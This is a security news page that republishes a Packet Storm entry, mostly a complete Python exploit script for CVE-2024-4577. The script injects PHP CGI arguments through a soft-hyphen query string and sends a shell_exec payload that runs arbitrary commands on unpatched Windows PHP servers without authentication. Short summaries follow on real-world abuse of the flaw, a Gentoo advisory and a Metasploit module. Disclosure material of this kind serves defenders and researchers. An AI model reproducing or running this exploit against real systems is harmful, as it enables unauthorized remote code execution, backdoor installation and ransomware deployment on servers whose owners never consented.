Security
Headlines
HeadlinesLatestCVEs

Headline

PHP Remote Code Execution

PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.

Packet Storm
#vulnerability#windows#js#git#php#rce#auth#firefox
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______   / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  | | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /  | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /   | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /     \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                                                                                                                                                                                                                                  Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py    ''')   def exploit(url, command):           payloads = {        '<?php echo "vulnerable"; ?>',        '<?php echo shell_exec("'+command+'"); ?>'     }        headers = {    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',    'Content-Type': 'application/x-www-form-urlencoded'}    s = Session()    for payload in payloads:        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"        req = Request('POST', url, data=payload, headers=headers)        prepped = req.prepare()        del prepped.headers['Content-Type']        resp = s.send(prepped,        verify=False,        timeout=15)        #print(prepped.headers)        #print(url)        #print(resp.headers)               #print(payload)        print(resp.status_code)        print(resp.text)if __name__ == '__main__':    title()    if(len(sys.argv) < 2):        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))                exit(0)    else:        exploit(sys.argv[1],sys.argv[2])

Related news

Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor

A previously undocumented backdoor named Msupedge has been put to use against a cyber attack targeting an unnamed university in Taiwan. "The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News. The origins of the backdoor are

Gentoo Linux Security Advisory 202408-32

Gentoo Linux Security Advisory 202408-32 - Multiple vulnerabilities have been discovered in PHP, the worst of which can lead to a denial of service. Versions greater than or equal to 8.1.29:8.1 are affected.

PHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks

Multiple threat actors have been observed exploiting a recently disclosed security flaw in PHP to deliver remote access trojans, cryptocurrency miners, and distributed denial-of-service (DDoS) botnets. The vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It

PHP CGI Argument Injection Remote Code Execution

This Metasploit module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D) character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch), and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches. XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.

TellYouThePass Ransomware Group Exploits Critical PHP Flaw

An RCE vulnerability that affects the Web scripting language on Windows systems is easy to exploit and can provide a broad attack surface.

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13